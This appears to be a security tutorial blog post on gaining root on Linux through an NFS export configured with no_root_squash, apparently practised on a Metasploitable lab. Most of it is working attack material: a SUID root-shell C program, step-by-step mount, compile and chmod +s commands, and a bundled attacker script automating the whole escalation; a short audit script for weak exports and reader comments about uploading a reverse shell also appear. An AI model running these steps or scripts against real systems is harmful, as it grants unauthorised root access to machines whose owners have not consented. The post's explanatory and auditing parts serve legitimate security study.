If you have a low-privilege shell on a machine and discover that it exports an NFS share, you may be able to use that share to escalate privileges, depending on how the export is configured. This post walks through exploiting weak permissions on an NFS server.
Index
- What is NFS?
- What is root_squash and no_root_squash?
- Required tools and program file.
- Exploit NFS and get a root shell.
What is NFS?
The Network File System (NFS) is a client/server application that lets a computer user view and optionally store and update files on a remote computer as though they were on the user’s own computer. The NFS protocol is one of several distributed file system standards for network-attached storage (NAS).
What is root_squash and no_root_squash?
The root_squash option maps requests that arrive from uid 0 on an NFS client to the anonymous user (nfsnobody on older Red Hat based systems, nobody on most others; adjustable with anonuid/anongid), which has minimal local privileges. The no_root_squash option turns that mapping off: a client that is root acts as root on the exported file system, so files it creates are owned by uid 0 and any SUID bit it sets is honored when the file is executed on the server. root_squash is the default, and administrators should leave it on unless there is a specific reason not to.
NOTE: To exploit this issue the export must be configured with no_root_squash and must be writable (rw). The final step also requires that binaries can be executed from the exported directory on the target; if it is mounted noexec there, the SUID binary cannot be run from it.
Required tools and program file.
The list is short: you just need showmount and a mount command with NFS support.
- showmount
- mount
- C program file (optional; the same source can be written straight into the mounted share)
To install the required commands (Debian based):
apt-get install nfs-common
nfs-common provides both showmount and NFS support for mount. cifs-utils, which is often installed alongside it, is for SMB/CIFS shares and is not needed here.
Program File(suid-shell.c):
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void) {
    /* The binary will be root-owned with the SUID bit set, so setuid(0) succeeds
       and makes the real uid 0 as well; bash then runs as full root. */
    setuid(0);
    system("/bin/bash");
    return 0;
}
Exploit NFS and Get Root Shell.
With a limited shell on the target, take a look at the /etc/exports file. It lists which directories (file systems) are exported to remote clients and with which options.
Here the /tmp directory is exported, so a remote client can mount it. The option list shows rw (read and write), sync, and no_root_squash; the last one is the insecure setting described above.
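The check that the walkthrough does by eye on /etc/exports can be scripted. The following is an added example, not part of the original post: a small POSIX shell audit that flags any export line carrying no_root_squash (the root squashing setting discussed above) and prints the hardened line for it. The sample exports file is constructed here; its first line mirrors the /tmp export described above, and the `*` client specification is an assumption, since the post does not show that column.

```shell
#!/bin/sh
# Added example, not part of the original post: audit an exports file for the
# no_root_squash weakness and print a hardened line for each hit.
# The sample file is constructed; its first line mirrors the walkthrough's export.
# The client spec "*" is an assumption (the post does not show that column).

SAMPLE_EXPORTS=$(mktemp)
cat > "$SAMPLE_EXPORTS" <<'EOF'
# /etc/exports (constructed sample)
/tmp            *(rw,sync,no_root_squash)
/srv/share      192.168.56.0/24(ro,sync,root_squash)
/home/backup    10.0.0.7(rw,sync)
EOF

# Return 0 if one export line carries no_root_squash in any client's option list.
# The path (first field) is dropped; tabs, "(", ")" and "," become spaces so every
# option is a whitespace-delimited token and a partial match cannot fool the test.
export_is_weak() {
    toks=" $(printf '%s\n' "$1" | tr '\t(),' '    ' | cut -d ' ' -f 2-) "
    case "$toks" in
        *" no_root_squash "*) return 0 ;;
    esac
    return 1
}

# Print the same export line with root squashing turned back on. root_squash is
# the default when neither option is written, so lines without it are left alone.
harden_export_line() {
    printf '%s\n' "$1" | sed 's/no_root_squash/root_squash/g'
}

# Print how many non-comment export lines in FILE are weak.
count_weak_exports() {
    n=0
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        if export_is_weak "$line"; then n=$((n+1)); fi
    done < "$1"
    echo "$n"
}

# Human-readable report: one line per export, plus the suggested fix for weak ones.
audit_exports() {
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        if export_is_weak "$line"; then
            printf 'WEAK  %s\n' "$line"
            printf '      fix: %s\n' "$(harden_export_line "$line")"
        else
            printf 'ok    %s\n' "$line"
        fi
    done < "$1"
}

audit_exports "$SAMPLE_EXPORTS"
echo "weak exports: $(count_weak_exports "$SAMPLE_EXPORTS")"
```

On a live server, `exportfs -v` prints the options actually in effect for each export, which is a better source than the raw file when options are omitted, because root_squash is applied by default. From the client side, `showmount -e` only tells you which paths are exported and to whom, not whether root squashing is on.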
Attacker Machine.
1. Open a terminal and list the target's exports: showmount -e [Linux VM IP Address]. This shows which paths are exported and to which clients; it does not reveal whether root squashing is on, which is why the /etc/exports check on the target matters.
2. Make a directory to mount the remote share on.
mkdir /tmp/test
3. Mount the remote /tmp on our /tmp/test. Do this as root locally, so that the files you create on the share are owned by uid 0; if the server does not offer NFSv2, change vers=2 to vers=3:
mount -o rw,vers=2 [Linux VM IP Address]:/tmp /tmp/test
4. Drop our C source file onto the share (the include lines keep recent gcc versions from rejecting the implicit declarations):
printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main(void) { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/test/suid-shell.c
5. Compile it; the binary also lands on the share:
gcc /tmp/test/suid-shell.c -o /tmp/test/suid-shell
6. Set the SUID bit on the compiled binary, not on the source file:
chmod +s /tmp/test/suid-shell
Victim Low Privilege Shell
Back in the low-privilege shell on the victim server, all that is left is to execute suid-shell from the /tmp folder:
cd /tmp
./suid-shell
Got Root… YaaaHoooo…
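The attacker-side steps above, collected into one script. This is an added example, not the post's own code; it assumes you are root on the attacking machine, that the target exports /tmp with rw and no_root_squash, and that the target IP is passed as the first argument. The default mount point /tmp/test is the one used in the walkthrough; the NFS version defaults to 3 here because many servers no longer offer NFSv2, and it can be overridden with the NFS_VERS environment variable (both the variable and the script name are assumptions).

```shell
#!/bin/sh
# Added example, not part of the original post: the attacker-side steps of the
# walkthrough gathered into one script, with the paths and step order corrected.
# Assumptions: run as root on the attacking machine (so files created on the share
# are owned by uid 0); the target exports /tmp with rw,no_root_squash; its IP is $1.

TARGET="${1:-}"
MNT="${2:-/tmp/test}"            # same local mount point as in the walkthrough
NFS_VERS="${NFS_VERS:-3}"        # the post used vers=2; many servers only offer 3 or 4

# Write the SUID shell source into DIR. setgid/setuid to 0 before spawning bash so
# the shell gets real and effective uid 0; bash would otherwise drop privileges.
write_suid_shell_source() {
    cat > "$1/suid-shell.c" <<'EOF'
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
EOF
    [ -s "$1/suid-shell.c" ]
}

# Compile inside the share and set the SUID and SGID bits on the binary (not on
# the .c file). Over a no_root_squash mount the result is root-owned on the target.
build_suid_shell() {
    gcc "$1/suid-shell.c" -o "$1/suid-shell" && chmod 6755 "$1/suid-shell"
}

# True if FILE is owned by root and has the SUID bit: the two properties the
# victim-side step depends on. Uses POSIX find only, no GNU stat needed.
is_suid_root() {
    [ -n "$(find "$1" -user root -perm -4000 2>/dev/null)" ]
}

main() {
    showmount -e "$TARGET"                                       # step 1: what is exported?
    mkdir -p "$MNT"                                              # step 2
    mount -t nfs -o "rw,vers=$NFS_VERS" "$TARGET:/tmp" "$MNT"    # step 3
    write_suid_shell_source "$MNT"                               # step 4
    build_suid_shell "$MNT"                                      # steps 5 and 6
    if is_suid_root "$MNT/suid-shell"; then
        echo "ready: from the low-privilege shell on the target, run /tmp/suid-shell"
    else
        echo "suid-shell is not root-owned and SUID; the server probably squashed root" >&2
        exit 1
    fi
}

if [ -n "$TARGET" ]; then
    main
else
    echo "usage: $0 <target-ip> [mountpoint]" >&2
fi
```

Run it as `./nfs-suid.sh <target-ip>`. The is_suid_root check at the end is the quickest way to confirm that root squashing was really off: if the binary on the share comes back owned by nobody or nfsnobody instead of root, the server squashed you and the victim-side step will not produce a root shell.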
Thanks for reading. Any feedback, please share it in the comment section. 😉
Happy Hacking.
I have a question that I was looking to answer for quite some time. I am going through Metasploitable and currently exploring NFS shares. My configuration file for NFS looks exactly like yours. I have gone through the steps of mounting and browsing the shares, I can create and copy files from my host. Question is: why, if I upload a reverse shell back to it, when executed am I basically pwning myself instead of a target? I must be missing something…
This is post-exploitation; for exploiting this issue you need any level of access (low or high privilege) on the target. First mount the target on your system and upload the reverse shell, add the permission, then go to your initial shell and execute it.